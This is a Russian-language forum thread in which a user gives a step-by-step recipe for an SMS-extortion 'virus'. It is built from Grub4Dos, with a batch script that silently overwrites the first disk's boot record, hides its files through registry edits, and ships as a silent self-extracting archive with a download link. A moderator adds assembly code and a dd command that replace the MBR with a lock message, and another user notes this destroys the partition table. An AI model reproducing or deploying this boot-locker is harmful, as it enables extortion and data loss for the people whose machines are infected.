Пользовательского поиска
Понедельник, 23.12.2024, 15:20
Приветствую Вас Гость | RSS
Главная | Вирус требующий отправку смс - Форум | Регистрация | Вход
Меню Проекта
Форма входа
Мы Рекомендуем:
Мнение Общественности
Какой объем должна занимать Мультизагрузочная флешка?
1. 8Gb
2. 4 gb
3. 16 Gb
4. 32 Gb
5. 2 Gb
6. 1 gb
7. 512 Mb
Всего ответов: 6156
Статистика
GreenFlash
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Sh1td0wn, asdqqww  
Вирус требующий отправку смс
hitmannnДата: Четверг, 30.12.2010, 18:52 | Сообщение # 1
Экспериментатор
Группа: Проверенные
Сообщений: 58
Репутация: 8
Статус: Отсутствует
В общем так. Пришла мне на днях идея – как из доброго дела сделать небольшой розыгрыш. Вот смотрите, у нас есть супер загрузчик Grub4Dos. Чтобы установить его на флешку, мы проделываем определенные действия: копирование файлов на флешку, создание menu.lst, добавление gfxboot темы, прописывание загрузчика в mbr.

Так вот, все эти действия можно автоматизировать. И автоматизировать их по-своему. И сделать установку Grub4Dos из 1 файла *.exe. При этом, этот файл будет прописывать загрузчик Grub4Dos на первый жесткий диск, ставить gfxboot тему biggrin с контентом, требующим отправки смс. biggrin

Хватит теории. Описываю действия. Типа "вирус" работает по принципу блокера винды.

Создаем папку, копируем на нее файлы:

menu.lst
GRLDR
logo - gfxboot тема
install.bat - в дальнейшем переделанный в install.exe
grubinst.exe - утилита для установки Grub4Dos.

Содержимое install.bat

Code

echo off
grubinst.exe (hd0)

attrib +h GRLDR
attrib +h MENU.LST
attrib +h logo
attrib +h grubinst.exe
attrib +h install.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f

exit

В menu.lst прописываем следующее:

Code

gfxmenu /logo

title Ввести код
reboot

Все эти файлы пакуем винраром, в sfx архив. В комментарий архива добавляем следующее:

Code

path=C:\
silent=1
overwrite=1
setup=install.exe

Теперь пакуем архив. Открываем его на виртуальной машине и видим веселую картину. Grub4Dos без вашего ведома прописался на диск C и при этом поставил gfxboot тему.

Да, намного проще 1 раз это проверить! Скачайте и запустите мою сборку этой штуки на виртуальной машине. И удивитесь! biggrin Вот ссылка http://depositfiles.com/files/u53x5tyt8

PS.
Вы можете сказать, а в чем подвох? Я ведь знаю, как из граба запустить винду!

Ан нет. Если файл GRLDR немножечко biggrin подправить Hex редактором, то стартануть винду при помощи chainloader уже не получится.

Нет, я не агитирую создавать вирусы. Просто рассматриваю вариант хитрого использования Grub4Dos.

Сообщение отредактировал hitmannn - Четверг, 30.12.2010, 21:12
 
BarbaДата: Четверг, 30.12.2010, 21:16 | Сообщение # 2
Экспериментатор
Группа: Проверенные
Сообщений: 121
Репутация: 13
Статус: Отсутствует
А зачем?
 
hitmannnДата: Четверг, 30.12.2010, 21:27 | Сообщение # 3
Экспериментатор
Группа: Проверенные
Сообщений: 58
Репутация: 8
Статус: Отсутствует
Quote (Barba)
А зачем?

Каждый решит для себя сам, для чего нужна эта сборка.
 
SirZhДата: Вторник, 04.01.2011, 21:56 | Сообщение # 4
Экспериментатор
Группа: Пользователи
Сообщений: 50
Репутация: 0
Статус: Отсутствует
Если завтра появится такая шняга, я знаю, кому уши откручивать.

Нормативные документы
 
crack21Дата: Среда, 05.01.2011, 22:03 | Сообщение # 5
Экспериментатор
Группа: Проверенные
Сообщений: 51
Репутация: 6
Статус: Отсутствует
твой ум да в мирные цели.
 
barabanДата: Воскресенье, 23.01.2011, 22:20 | Сообщение # 6
Ищущий
Группа: Пользователи
Сообщений: 27
Репутация: 0
Статус: Отсутствует
сделал-бы для семерки, что-бы только меню лист править.
 
Sh1td0wnДата: Воскресенье, 23.01.2011, 22:28 | Сообщение # 7
Программист
Группа: Модераторы
Сообщений: 3829
Репутация: 210
Статус: Отсутствует
Ну куда так сложно?
Код для nasm на x86-assembler'е, выводящий надпись (в кодировке ASCII):

Code
org    7C00h       
start:    mov    ah, 0Eh      
     
   lea    si, [message]     
          
print:    mov    al, [si]     
     
   cmp    al, 0      
   jz    done
     
   int    10h      
          
     
   inc    si      
   jmp  print
     
done:    mov    ah, 00h      
   int    16h      
     
message  db    'Sorry, no more windows there.', 0   
zero  times    512 -($-$$) -2    db 0   
signature    dw    0xAA55

Результат компиляции запишите в MBR и радуйтесь.


НАЖМИ МЕНЯ, прежде чем что-либо написать
 
barabanДата: Воскресенье, 23.01.2011, 22:53 | Сообщение # 8
Ищущий
Группа: Пользователи
Сообщений: 27
Репутация: 0
Статус: Отсутствует
большое спасибо но это для меня темный лес. в лутшем случае смогу поменять МБР
 
kDnДата: Понедельник, 24.01.2011, 01:31 | Сообщение # 9
Программист
Группа: Проверенные
Сообщений: 817
Репутация: 66
Статус: Отсутствует
Sh1td0wn,
Code
zero  times    512 -($-$$) -2    db 0

Прощай таблица разделов.

* Будет очень интересно поглядеть, как кто-то после таких экспериментов у благодарных пользователей будет данные выковыривать))). Либо по звездам таблицу разделов восстанавливать. Так шо - радоваться будет долго, если отловят да за яйца подвесят.
biggrin

 
Sh1td0wnДата: Понедельник, 24.01.2011, 12:42 | Сообщение # 10
Программист
Группа: Модераторы
Сообщений: 3829
Репутация: 210
Статус: Отсутствует
А если не забивать остаток файла нулями и не добавлять сигнатуру, то QEMU с него не загрузится.
Таблицу разделов можно и не трогать: dd if=mbr of=/dev/sdX bs=1 count=446


НАЖМИ МЕНЯ, прежде чем что-либо написать
 
  • Страница 1 из 1
  • 1
Поиск:
Чат

Copyright GreenFlash © 2024
Рейтинг@Mail.ru